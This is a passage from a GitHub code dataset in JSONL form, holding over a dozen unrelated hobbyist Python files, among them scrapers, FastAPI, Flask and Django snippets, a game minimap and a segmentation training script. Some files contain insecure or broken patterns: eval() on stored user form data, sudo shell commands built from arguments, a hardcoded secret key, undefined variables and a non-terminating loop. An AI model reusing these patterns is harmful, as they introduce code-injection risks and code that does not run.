session.close()\n","repo_name":"kibuchijw/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/14-model_city_fetch_by_state.py","file_name":"14-model_city_fetch_by_state.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36737871573","text":"#sum.py\n# A program that finds the sum of a number from 1 to 1000\n# using a for loop\n\ndef main():\n sum = 0\n n = 1000\n\n for number in range (n+1):\n sum = sum + number\n\n print(sum)\n\nmain()\n\n \n","repo_name":"Barryelias/lab1","sub_path":"sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72331078508","text":"from pico2d import *\n\nclass Mini_Map:\n\n TIME_PER_ACTION = 0.08\n ACTION_PER_TIME = 1.0 / TIME_PER_ACTION\n FRAMES_PER_ACTION = 8\n\n STAGE1, STAGE2 , STAGE3 , STAGE4 , RUN , STAND = 1, 2 , 3 , 4 , 5 , 6\n stage1_image = None\n stage2_image = None\n stage3_image = None\n stage4_image = None\n position_image = None\n\n def __init__(self):\n self.stage = Mini_Map.STAGE1\n if Mini_Map.stage1_image == None:\n Mini_Map.stage1_image = load_image(\"./image/map.png\")\n if Mini_Map.stage2_image == None:\n Mini_Map.stage2_image = load_image(\"./image/map2.png\")\n if Mini_Map.stage3_image == None:\n Mini_Map.stage3_image = load_image(\"./image/map3.png\")\n if Mini_Map.stage4_image 
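# --- Editor's note ---
# sum.py above accumulates 1..n in a loop; the closed form n*(n+1)//2 gives
# the same total in O(1) (for n = 1000 both yield 500500):
def gauss_sum(n: int) -> int:
    return n * (n + 1) // 2

assert gauss_sum(1000) == sum(range(1001)) == 500500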
== None:\n Mini_Map.stage4_image = load_image(\"./image/map4.png\")\n if Mini_Map.position_image == None:\n Mini_Map.position_image = load_image(\"./image/moving.png\")\n self.position_x = 120\n self.position_y = 320\n self.total_frames = 0.0\n self.state = Mini_Map.STAND\n self.speed = 0\n\n def update(self,frame_time,morale,ingame_time):\n def clamp(minimum, x, maximum):\n return max(minimum, min(x, maximum))\n self.total_frames += Mini_Map.FRAMES_PER_ACTION * Mini_Map.ACTION_PER_TIME * frame_time\n if self.state == Mini_Map.RUN:\n self.position_x += self.speed\n if self.position_x>=500:\n morale.state = morale.SUCCESS\n if ingame_time.run_time :\n ingame_time.stop()\n\n\n\n def draw(self):\n if self.stage==1:\n self.stage1_image.clip_draw(0,0,600,100,400,340)\n if self.stage==2:\n self.stage2_image.clip_draw(0,0,600,100,400,340)\n if self.stage==3:\n self.stage3_image.clip_draw(0,0,600,100,400,340)\n if self.stage==4:\n self.stage4_image.clip_draw(0,0,600,100,400,340)\n self.position_image.clip_draw(0,0,22,24,self.position_x,self.position_y)\n\n def handle_event(self, event, unit):\n\n if (event.type, event.key) == (SDL_KEYDOWN, SDLK_RIGHT):\n print(self.speed)\n self.state = Mini_Map.RUN\n if self.speed>=0:\n self.speed += Mini_Map.TIME_PER_ACTION\n elif (event.type, event.key) == (SDL_KEYDOWN, SDLK_z):\n if unit.state in (unit.STAND, unit.RUN):\n self.state = Mini_Map.STAND\n elif (event.type, event.key) == (SDL_KEYUP, SDLK_RIGHT):\n self.state = Mini_Map.STAND\n if self.speed>=Mini_Map.TIME_PER_ACTION:\n self.speed -= Mini_Map.TIME_PER_ACTION\n elif (event.type, event.key) == (SDL_KEYUP, SDLK_z):\n if unit.check_run:\n self.state = Mini_Map.RUN","repo_name":"GreeeeeShot/2dgp","sub_path":"project_ahead/mini_map.py","file_name":"mini_map.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37218090373","text":"#!/usr/bin/python\nfrom subprocess import check_output\nimport sys\nimport time\nimport os\n\n\ndef get_all_interface():\n output = check_output(\"sudo ip l\", shell=True)\n return output\n\n\ndef set_interface_up(name):\n while True:\n if name in get_all_interface():\n print(\"sudo ifup %s\" % name)\n os.system(\"sudo ifup %s\" % name)\n return\n time.sleep(1)\n\n\ndef main():\n for i in sys.argv[1:]:\n set_interface_up(i)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"kjelly/kolla-ansible-docker","sub_path":"kolla-prepare/ifup.py","file_name":"ifup.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44102809061","text":"from fastapi import FastAPI, HTTPException\nfrom starlette.responses import HTMLResponse\nfrom os.path import join, dirname, exists\n\napp = FastAPI()\n\nFILE_PATH = join(dirname(__file__), 'client_forms.txt')\n\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def read_items():\n html_content = \"\"\"\n \n \n Backend for Portfolio\n \n \n This is Backend for Portfolio website github/\n \n \n \"\"\"\n return HTMLResponse(content=html_content, status_code=200)\n\n\n@app.get('/client_form')\ndef test_func(name, email, phone=None):\n user = {\n \"name\": name,\n \"email\": email\n }\n\n if phone and len(phone) > 6:\n user[\"phone\"] = phone\n else:\n raise HTTPException(status_code=422, detail=\"Incorrect phone number\")\n\n with open(FILE_PATH, 'a') as f:\n f.write(str(user) + '\\n')\n\n return user\n\n\n@app.get('/all_client_form')\ndef 
all_client_form():\n    users = []\n\n    if exists(FILE_PATH):\n        with open(FILE_PATH) as f:\n            for line in f:\n                users.append(eval(line.rstrip()))\n\n    return users","repo_name":"AnlieJams/My-WebSite","sub_path":"My Web Site/server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74018532268","text":"'''\n39 - A sum of R$ 780,000.00 will be divided among the three winners of a contest.\nOut of the total amount:\n\n * The first winner will receive 46%;\n * The second will receive 32%;\n * The third will receive the remainder;\n\n Compute and print the amount won by each of the winners.\n'''\n\n# ANSWER\n\npremiação = 780000.00\nprimeiro = (46 / 100) * premiação\nsegundo = (32 / 100) * premiação\nterceiro = (22 / 100) * premiação\nprint(f'First {primeiro:.5f} \\nSecond {segundo:.5f}'\n      f' \\nThird {terceiro:.5f}\\n')\ntotal = primeiro + segundo + terceiro\nprint(f'Total prize {total:.5f}')\n\n","repo_name":"Leownhart/My_Course_of_python","sub_path":"Geek University/Seção 4/Exercicios/EX39.py","file_name":"EX39.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20163514521","text":"import argparse\nimport csv\nimport requests\nimport json\nimport logging\n\nfrom pkg.net import EngageNet\n\n\"\"\"Python3 app to list all activities for a client and export the \n   results as a CSV. Each line of the CSV is an action and contains\n   the usual information that clients want to see.\"\"\"\n\ndef listActivityTypes(webToken):\n\t\"\"\"Return a list of valid activity types\n\n\tParameters:\n\t\twebToken \tEngage Web Developer API token\n\n\tErrors:\n\t\tHTTP errors are also noisily fatal.\n\t\tEngage-specific errors are also noisily fatal.\n\t\"\"\"\n\n\t# Parameters for EngageNet\n\tparams = {\n\t    'endpoint': 'api/developer/ext/v1/activities/types',\n\t    'host': 'api.salsalabs.org',\n\t    'token': webToken,\n\t    'method': 'GET',\n\t    'request': \"\"\n\t}\n\tnet = EngageNet(**params)\n\tr = net.run()\n\tp = r['payload']\n\tr = p['results']\n\tt = list((s['code'] for s in r))\n\treturn t\n\ndef listActivities(intToken, webToken, writer):\n\t\"\"\"Read a list of activities. 
Write typically useful information\n\t\tto a CSV file.\n\n\tParameters:\n\t\tintToken Engage Integration API token\n\t\twebToken\tEngage Web Developer API token\n\t\twriter\t\tCSV writer to receive output\n\n\tErrors:\n\t\tHTTP errors are also noisily fatal.\n\t\tEngage-specific errors are also noisily fatal.\n\t\"\"\"\n\n\tactivityTypes = listActivityTypes(webToken)\n\tif activityTypes == None:\n\t\tlogging.fatal('Error: could not retrieve activity type list')\n\t\texit(1)\n\n\tcolumns ='id,dateCreated,datePublished,status,visibility,type,name'.split(',')\n\twriter.writerow(columns)\n\n\tcount = 20\n\toffset = 0\n\twhile count > 0:\n\t\tqueries = {\n\t\t\t'formType': ','.join(activityTypes),\n\t\t\t'sortOrder': 'ASCENDING',\n\t\t\t'count': count,\n\t\t\t'offset': offset\n\t\t}\n\t\tparams = {\n\t\t 'endpoint': 'api/developer/ext/v1/activities',\n\t\t 'host': 'api.salsalabs.org',\n\t\t 'token': webToken,\n\t\t 'method': 'GET',\n\t\t 'request': queries\n\t\t}\n\t\tnet = EngageNet(**params)\n\t\tresponse = net.run()\n\n\t\tpayload = response['payload']\n\t\tcount = payload['count']\n\t\tif count == 0:\n\t\t\tcontinue\n\t\tresults = payload['results']\n\t\tfor r in results:\n\t\t\tif r['status'] == 'PUBLISHED':\n\t\t\t\tpublished = r['publishDate'][0:10]\n\t\t\telse:\n\t\t\t\tpublished = \"\"\n\t\t\trow = [r['id'],\n\t\t\t\tr['createDate'][0:10],\n\t\t\t\tpublished,\n\t\t\t\tr['status'],\n\t\t\t\tr['visibility'],\n\t\t\t\tr['type'],\n\t\t\t\tr['name']]\n\t\t\twriter.writerow(row)\n\t\toffset = offset + count\n\ndef main():\n\t\"\"\"Program entry point. Uses a user-provided id, retrieves\n\tactivities and outputs JSON to the console.\"\"\"\n\n\tlogging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)\n\tparser = argparse.ArgumentParser(\n\t\tdescription='See list of forms for an form type')\n\tparser.add_argument(\"--intToken\", action='store', required=True,\n\t\t\t\t\t\thelp='Engage Integration API token')\n\tparser.add_argument('--webToken', action='store', required=True,\n\t\t\t\t\t\thelp='Engage Web Developer API token')\n\n\targs = parser.parse_args()\n\twith open('activity_list.csv', 'w') as f:\n\t\tw = csv.writer(f)\n\t\tlistActivities(args.intToken, args.webToken, w)\n\t\tf.flush()\n\t\tf.close()\n\n\nif (__name__) == '__main__':\n\tmain()\n","repo_name":"salsalabs/engage_api_python3","sub_path":"activity/generic/activity_form_list.py","file_name":"activity_form_list.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35632604370","text":"from django import forms\n\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n title = forms.CharField(widget=forms.TextInput(attrs={\"placeholder\": \"Your Title text\"}))\n description = forms.CharField(required=False, widget=forms.Textarea(attrs={\"class\": \"new-class-name two\", \"id\": \"my-id-for-textarea\", \"rows\": 20, \"cols\": 40}))\n # email = forms.EmailField()\n price = forms.DecimalField(initial=199.99)\n\n class Meta:\n model = Product\n fields = [\n 'title',\n 'description',\n 'price'\n ]\n\n def clean_title(self, *args, **kwargs):\n title = self.cleaned_data.get(\"title\")\n # if not \"CFE\" in title:\n # raise forms.ValidationError(\"This is not a valid title\")\n return title\n\n # def clean_email(self, *args, **kwargs):\n # email = self.cleaned_data.get(\"email\")\n # if not email.endswith(\"edu\"):\n # raise forms.ValidationError(\"This is not a valid email\")\n # return email\n\n\nclass 
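# --- Editor's note (hedged sketch) ---
# listActivities() above pages through results with a count/offset pair and
# stops when the server reports count == 0. The generic shape of that loop,
# independent of the EngageNet wrapper (fetch_page is a hypothetical callable
# returning an Engage-style payload dict):
def iterate_pages(fetch_page, page_size=20):
    offset = 0
    while True:
        payload = fetch_page(count=page_size, offset=offset)
        if payload["count"] == 0:
            break
        yield from payload["results"]
        offset += payload["count"]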
OldProductForm(forms.ModelForm):\n class Meta:\n model = Product\n fields = [\n 'title',\n 'description',\n 'price'\n ]\n\n\nclass RawProductForm(forms.Form):\n title = forms.CharField(widget=forms.TextInput(attrs={\n \"placeholder\": \"Your Title text\"\n }))\n description = forms.CharField(\n required=False,\n widget=forms.Textarea(\n attrs={\n \"class\": \"new-class-name two\",\n \"id\": \"my-id-for-textarea\",\n \"rows\": 20,\n \"cols\": 40\n }\n )\n )\n price = forms.DecimalField(initial=199.99)\n\n\n","repo_name":"kirankotari/tryDjango","sub_path":"src/products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72226967468","text":"from flask import Flask, escape, request, session\n\napp = Flask(__name__)\napp.secret_key = \"asveniruby\" # 密钥,真实环境下为动态密钥\n\n\n@app.route('/')\ndef hello():\n name = request.args.get(\"name\", \"World\")\n return f'Hello, {escape(name)}!'\n\n\n# env FLASK_APP=flask_app flask run 运行接口\n# env FLASK_ENV=development FLASK_APP=flask_app flask run 开发模式运行接口\n\n# -----------------------#####-----------------------\n\n# 创建路由\n@app.route(\"/login\", methods=['get', 'post'])\ndef login():\n res = {\n \"method\": request.method,\n \"url\": request.path,\n \"args\": request.args, # 参数\n \"form\": request.form\n }\n session['username'] = request.args.get('name')\n return res\n","repo_name":"XuXuClassMate/My_Test_PyProject","sub_path":"terrace/Study_notes/rear_end/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73870280426","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport pandas as pd\nfrom tqdm import tqdm\n\nstart = time.time()\n\n# Limiting parameter\nlimit_100 = True\n\n# URLs to scrape\nsites = [\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa/\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=2\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=3\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=4\",\n \"https://www.otomoto.pl/osobowe/mercedes-benz/gl-klasa?page=5\"\n]\n\n# Actual program:\nlinks_list = []\n\n# Iterate over given sites\nfor site in sites:\n response = requests.get(site)\n soup = BeautifulSoup(response.content, \"html.parser\")\n \n # if cookies pop up, accept them\n cookies_button = soup.select_one(\"#onetrust-accept-btn-handler\")\n if cookies_button:\n requests.get(cookies_button[\"href\"])\n time.sleep(5)\n \n # find all objects with offers\n links = soup.select('main article[data-variant=\"regular\"] h2 a')\n for link in links:\n # get all links to offers\n links_list.append(link[\"href\"])\n \n # if limit_100 is enabled, stop after reaching 100 links\n if limit_100 and len(links_list) == 100:\n break\n \n # stop iterating if the limit is reached\n if limit_100 and len(links_list) == 100:\n break\n\n# Create output dataframe\ndf = pd.DataFrame(\n columns=['price', 'mileage', 'power', 'prod_year', 'seats_num', 'fuel', 'color', 'link']\n)\n\n# Iterate over offer links\nfor link in tqdm(links_list):\n response = requests.get(link)\n soup = BeautifulSoup(response.content, \"html.parser\")\n row = [None] * 8 # Initialize the row with None values\n \n # price\n price_element = soup.select_one(\"span.offer-price__number\")\n if price_element:\n txt = price_element.get_text(strip=True)\n row[0] 
= int(''.join([s for s in txt.split() if s.isdigit()]))\n else:\n for retry in range(3):\n time.sleep(5)\n response = requests.get(link)\n soup = BeautifulSoup(response.content, \"html.parser\")\n price_element = soup.select_one(\"span.offer-price__number\")\n if price_element:\n txt = price_element.get_text(strip=True)\n row[0] = int(''.join([s for s in txt.split() if s.isdigit()]))\n break\n\n\n # mileage\n mileage_element = soup.select_one(\"span:-soup-contains('Przebieg') + div\")\n if mileage_element:\n txt = mileage_element.get_text(strip=True)\n row[1] = int(''.join([s for s in txt.split() if s.isdigit()]))\n\n # power\n power_element = soup.select_one(\"span:-soup-contains('Moc') + div\")\n if power_element:\n txt = power_element.get_text(strip=True)\n row[2] = int(''.join([s for s in txt.split() if s.isdigit()]))\n\n # production year\n prod_year_element = soup.select_one(\"span:-soup-contains('Rok produkcji') + div\")\n if prod_year_element:\n row[3] = int(prod_year_element.get_text(strip=True))\n\n # number of seats\n seats_num_element = soup.select_one(\"span:-soup-contains('Liczba miejsc') + div\")\n if seats_num_element:\n row[4] = int(seats_num_element.get_text(strip=True))\n\n # fuel\n fuel_element = soup.select_one(\"span:-soup-contains('Rodzaj paliwa') + div a\")\n if fuel_element:\n row[5] = fuel_element.get_text(strip=True)\n\n # color\n color_element = soup.select_one(\"span:-soup-contains('Kolor') + div a\")\n if color_element:\n row[6] = color_element.get_text(strip=True)\n\n # link\n row[7] = link\n \n print(row)\n\n # add new row to df\n df.loc[len(df)] = row\n\n time.sleep(5)\n \n# save as csv\ndf.to_csv(\"offers.csv\", index=False, header=True)\n\nend = time.time()\n\n# save time measurement\nwith open('running_time.txt', 'w') as f:\n f.write('Running time of BeautifulSoup scraper:\\n')\n f.write(f\"{round(end - start, 2)} seconds\")\n","repo_name":"jtbandurski/WebScraping","sub_path":"soup/bs4-otomoto.py","file_name":"bs4-otomoto.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10781604366","text":"from csv import reader\nfrom .collisions import bt\n\n\ndef import_csv_layout(path):\n\tblocks_map = []\n\twith open(path) as map:\n\t\tlevel = reader(map,delimiter = ',')\n\t\t#for i in range(4): # i tried\n\t\t#\tblocks_map += [[0]*5]\n\t\tfor row in level:\n\t\t\ttemp = [int(i) for i in row]\n\t\t\tblocks_map.append(temp)\n\t\t#print(blocks_map,'\\n')\n\t\treturn list(zip(*blocks_map[::-1])) # blocks_map\n\n\nif __name__ == \"__main__\": # testing\n\tpath = \"./bloc_pics/map.csv\"\n\tfor i in import_csv_layout(path):\n\t print(i)","repo_name":"ano0002/E-mars","sub_path":"mining_game/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41077893303","text":"import hashlib, string, random\n\ndef hammingdistance(val1,val2): # calculates the number of indicies where values don't match\n output = sum(val1 != val2 for val1, val2 in zip(val1, val2)) # != is used as an xor operator \n return output\ndef generateString(n): # generates random string of length n \n all_characters = string.hexdigits\n newstring = ''\n for x in range(0,n): \n newstring = newstring + random.choice(all_characters)\n return newstring\ndef find_preimage(target, n): # generates random hash values until the first n characters match the target hash\n target = 
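# --- Editor's note (hedged sketch) ---
# hammingdistance() in a2_preimage.py compares hex strings character by
# character, so it measures distance in hex digits rather than bits. A
# bit-level Hamming distance for equal-length byte strings is an XOR
# followed by a popcount:
def bit_hamming(a: bytes, b: bytes) -> int:
    assert len(a) == len(b)
    diff = int.from_bytes(a, "big") ^ int.from_bytes(b, "big")
    return bin(diff).count("1")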
target.encode('hex')[:n*2]\n    random_string = generateString(n*2)\n    random_hash = hashlib.sha256(random_string).digest().encode('hex')[:n*2]\n    while hammingdistance(target, random_hash) > 0 : \n        random_string = generateString(n*2)\n        random_hash = hashlib.sha256(random_string).digest().encode('hex')[:n*2]\n    return random_string # returns the generated string that matches the first n hash values of the target\n    \n","repo_name":"maccarlton25/cryptographic-hash-functions","sub_path":"a2_preimage.py","file_name":"a2_preimage.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39683515655","text":"# -*- coding: utf-8 -*-\n\"\"\"This script visits the links in preprint_list.tsv, extracting\nthe tweets and the handles, so that we end up with tabular data.\n\"\"\"\n\nfrom bs4 import BeautifulSoup as bsoup\nfrom selenium import webdriver\nimport csv\n\n\ndef createHeadlessFirefoxBrowser():\n\n    # Create the browser\n\n    options = webdriver.FirefoxOptions()\n    options.add_argument(\"--headless\")\n    return webdriver.Firefox(options=options)\n\n\ndef scrape_tweets(url):\n\n    # Access the page\n    browser = createHeadlessFirefoxBrowser()\n    browser.implicitly_wait(10)\n    try:\n        browser.get(url)\n    except Exception:\n        print(f\"Could not scrape this url: {url}\")\n        browser.quit()\n    else:\n        # Scrape the page\n        paper_html = bsoup(browser.page_source, \"html.parser\")\n\n        browser.quit()\n\n        paper_title = paper_html.find(\"h1\", {\"id\": \"page-title\"}).get_text()\n        html_handles = paper_html.find_all(\"div\", class_=\"handle\")\n        html_posts = paper_html.find_all(\"p\", class_=\"summary\")\n\n        # Extract only the text\n        posts = [i.get_text() for i in html_posts]\n        handles = [i.get_text() for i in html_handles]\n\n        # Build the final list\n        paper_table = []\n        for j in range(len(handles)):\n            dict_atual = {\n                \"paper_link\": url,\n                \"paper_title\": paper_title,\n                \"handle\": handles[j],\n                \"message\": posts[j],\n            }\n            paper_table.append(dict_atual)\n\n        return paper_table\n\n\ndef main(max_preprints=500):\n    \"\"\"max_preprints sets the maximum number of preprints from the\n    preprint_list that will be scraped. 
Altere caso deseje raspar mais ou menos.\"\"\"\n\n with open(\"preprint_list.tsv\", \"r\") as f:\n preprints = f.read().splitlines()\n\n # Raspando a página de cada preprint\n resultado_final = []\n for preprint in preprints[0:max_preprints]:\n try:\n atual = scrape_tweets(preprint)\n resultado_final.extend(atual)\n except Exception:\n pass\n\n # Escrevendo o dado final\n keys = resultado_final[0].keys()\n with open(\"data/preprint_tweets.csv\", \"w\", newline=\"\") as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(resultado_final)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jvfe/nobudgetsci-tweets","sub_path":"scrape_tweets.py","file_name":"scrape_tweets.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37560855550","text":"class Mahasiswa(object):\r\n def __init__(self, nama, nim, kota, uangsaku):\r\n self.nama = nama\r\n self.nim = nim\r\n self.tempatTinggal = kota\r\n self.uangSaku = uangsaku\r\n\r\nm0 = Mahasiswa(\"Jono\", 123, \"Sragen\", 240000)\r\nm1 = Mahasiswa(\"Andi\", 154, \"Yogyakarta\", 230000)\r\nm2 = Mahasiswa(\"Jordi\", 108, \"Surakarta\", 230000)\r\nm3 = Mahasiswa(\"Lala\", 140, \"Surakarta\", 235000)\r\nm4 = Mahasiswa(\"Putri\", 113, \"Boyolali\", 240000)\r\nm5 = Mahasiswa(\"Raihan\", 132, \"Semarang\", 250000)\r\nm6 = Mahasiswa(\"Janis\", 186, \"Klaten\", 245000)\r\nm7 = Mahasiswa(\"Nanda\", 199, \"Wonogiri\", 245000)\r\nm8 = Mahasiswa(\"Putantri\", 187, \"Klaten\", 245000)\r\nm9 = Mahasiswa(\"Hardi\", 153, \"Karanganyar\", 270000)\r\nm10 = Mahasiswa(\"Maya\", 148, \"Purwodadi\", 265000)\r\n\r\nDaftar = [m0, m1, m2, m3, m4, m5, m6, m7, m8, m9, m10]\r\n\r\ndef cariLinkedList(head, target):\r\n temp = head\r\n while temp.data != None:\r\n if temp.data == target:\r\n return temp\r\n return -1\r\n","repo_name":"L200184098/Prak_Algostruk","sub_path":"L200184098_Modul4_H/No5.py","file_name":"No5.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34181596790","text":"import torch\nfrom torch.autograd import Variable\nimport argparse\nfrom datetime import datetime\nfrom lib.TransFuse import TransFuse_S\n# from utils.dataloader import get_loader, test_dataset\nfrom utils.utils import AvgMeter\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom test_isic import mean_dice_np, mean_iou_np\nimport os\nfrom datasets.dataset_synapse import Synapse_dataset, RandomGenerator\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom utils.utils import DiceLoss\nfrom torch.nn.modules.loss import CrossEntropyLoss\n\n# def structure_loss(pred, mask):\n# mask = mask.type('torch.cuda.FloatTensor')\n# mask = mask.reshape(mask.shape[0], -1, mask.shape[1], mask.shape[2])\n# weit = 1 + 5*torch.abs(F.avg_pool2d(mask, kernel_size=31, stride=1, padding=15) - mask)\n# wbce = F.binary_cross_entropy_with_logits(pred, mask, reduction='none')\n# wbce = (weit*wbce).sum(dim=(2, 3)) / weit.sum(dim=(2, 3))\n\n# pred = torch.sigmoid(pred)\n# inter = ((pred * mask)*weit).sum(dim=(2, 3))\n# union = ((pred + mask)*weit).sum(dim=(2, 3))\n# wiou = 1 - (inter + 1)/(union - inter+1)\n# return (wbce + wiou).mean()\n\n\ndef train(train_loader, model, optimizer, epoch, best_loss, opt, iter_num):\n model.train()\n ce_loss = CrossEntropyLoss()\n dice_loss = 
DiceLoss(opt.num_class)\n for i_batch, sampled_batch in enumerate(train_loader):\n image_batch, label_batch = sampled_batch['image'], sampled_batch['label']\n image_batch, label_batch = image_batch.cuda(), label_batch.cuda()\n outputs = model(image_batch)\n loss_ce_4 = ce_loss(outputs[0], label_batch[:].long())\n loss_ce_3 = ce_loss(outputs[1], label_batch[:].long())\n loss_ce_2 = ce_loss(outputs[2], label_batch[:].long())\n loss_ce = 0.5 * loss_ce_2 + 0.3 * loss_ce_3 + 0.2 * loss_ce_4\n loss_dice_4 = dice_loss(outputs[0], label_batch, softmax=True)\n loss_dice_3 = dice_loss(outputs[1], label_batch, softmax=True)\n loss_dice_2 = dice_loss(outputs[2], label_batch, softmax=True)\n loss_dice = 0.5 * loss_dice_2 + 0.3 * loss_dice_3 + 0.2 * loss_dice_4\n loss = 0.4 * loss_ce + 0.6 * loss_dice\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), opt.grad_norm)\n optimizer.step()\n\n iter_num = iter_num + 1\n print('iteration %d : loss : %f, loss_ce: %f' % (iter_num, loss.item(), loss_ce.item()))\n\n\n\n# def test(model, path):\n\n# model.eval()\n# mean_loss = []\n\n# for s in ['val', 'test']:\n# image_root = '{}/data_{}.npy'.format(path, s)\n# gt_root = '{}/mask_{}.npy'.format(path, s)\n# test_loader = test_dataset(image_root, gt_root)\n\n# dice_bank = []\n# iou_bank = []\n# loss_bank = []\n# acc_bank = []\n\n# for i in range(test_loader.size):\n# image, gt = test_loader.load_data()\n# image = image.cuda()\n\n# with torch.no_grad():\n# _, _, res = model(image)\n# loss = structure_loss(res, torch.tensor(gt).unsqueeze(0).unsqueeze(0).cuda())\n\n# res = res.sigmoid().data.cpu().numpy().squeeze()\n# gt = 1*(gt>0.5) \n# res = 1*(res > 0.5)\n\n# dice = mean_dice_np(gt, res)\n# iou = mean_iou_np(gt, res)\n# acc = np.sum(res == gt) / (res.shape[0]*res.shape[1])\n\n# loss_bank.append(loss.item())\n# dice_bank.append(dice)\n# iou_bank.append(iou)\n# acc_bank.append(acc)\n \n# print('{} Loss: {:.4f}, Dice: {:.4f}, IoU: {:.4f}, Acc: {:.4f}'.\n# format(s, np.mean(loss_bank), np.mean(dice_bank), np.mean(iou_bank), np.mean(acc_bank)))\n\n# mean_loss.append(np.mean(loss_bank))\n\n# return mean_loss[0] \n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--epoch', type=int, default=150, help='epoch number')\n parser.add_argument('--lr', type=float, default=0.001, help='learning rate')\n parser.add_argument('--batchsize', type=int, default=8, help='training batch size')\n parser.add_argument('--grad_norm', type=float, default=2.0, help='gradient clipping norm')\n parser.add_argument('--train_path', type=str,\n default='data/', help='path to train dataset')\n parser.add_argument('--test_path', type=str,\n default='data/', help='path to test dataset')\n parser.add_argument('--train_save', type=str, default='TransFuse_S')\n parser.add_argument('--beta1', type=float, default=0.5, help='beta1 of adam optimizer')\n parser.add_argument('--beta2', type=float, default=0.999, help='beta2 of adam optimizer')\n parser.add_argument('--data_path', type=str, default= '../Synapse/train_npz/', help='dataset path')\n parser.add_argument('--list_dir', type=str, default= '../Synapse/lists/lists_Synapse', help='list_dir')\n parser.add_argument('--num_class', type=int, default=14, help='number of segmentation classes')\n parser.add_argument('-o', '--log-path', type=str, default= 'log/', help='log path')\n opt = parser.parse_args() \n\n # ---- build models ----\n model = TransFuse_S(pretrained=True, num_classes=opt.num_class).cuda()\n params = 
model.parameters()\n optimizer = torch.optim.Adam(params, opt.lr, betas=(opt.beta1, opt.beta2))\n \n # image_root = '{}/data_train.npy'.format(opt.train_path)\n # gt_root = '{}/mask_train.npy'.format(opt.train_path)\n\n # train_loader = get_loader(image_root, gt_root, batchsize=opt.batchsize)\n db_train = Synapse_dataset(base_dir=opt.data_path, list_dir=opt.list_dir, split=\"train\",\n transform=transforms.Compose(\n [RandomGenerator(output_size=[192, 256])]))\n def worker_init_fn(worker_id):\n random.seed(args.seed + worker_id)\n train_loader = DataLoader(db_train, batch_size=opt.batchsize, shuffle=True, num_workers=0, pin_memory=True,\n worker_init_fn=worker_init_fn)\n total_step = len(train_loader)\n\n print(\"#\"*20, \"Start Training\", \"#\"*20)\n\n best_loss = 1e5\n for epoch in range(1, opt.epoch + 1):\n best_loss = train(train_loader, model, optimizer, epoch, best_loss, opt, epoch)\n save_interval = 10\n if epoch == 1:\n save_mode_path = os.path.join(opt.log_path + 'Transfuse_new_epoch_' + str(epoch) + '.pth')\n torch.save(model.state_dict(), save_mode_path)\n\n if (epoch + 1) % save_interval == 0:\n save_mode_path = os.path.join(opt.log_path + 'Transfuse_new_epoch_' + str(epoch) + '.pth')\n torch.save(model.state_dict(), save_mode_path)\n\n if epoch >= opt.epoch - 1:\n save_mode_path = os.path.join(opt.log_path + 'Transfuse_new_epoch_' + str(epoch) + '.pth')\n torch.save(model.state_dict(), save_mode_path)\n break","repo_name":"marcochen11/EECS545_Final_Proj","sub_path":"train_isic.py","file_name":"train_isic.py","file_ext":"py","file_size_in_byte":7071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9830549393","text":"import sys\nimport os\nimport json\nimport urllib.request\nfrom pprint import pprint\nimport datetime\nfrom datetime import timedelta\nimport mysql.connector\nimport csv\nimport 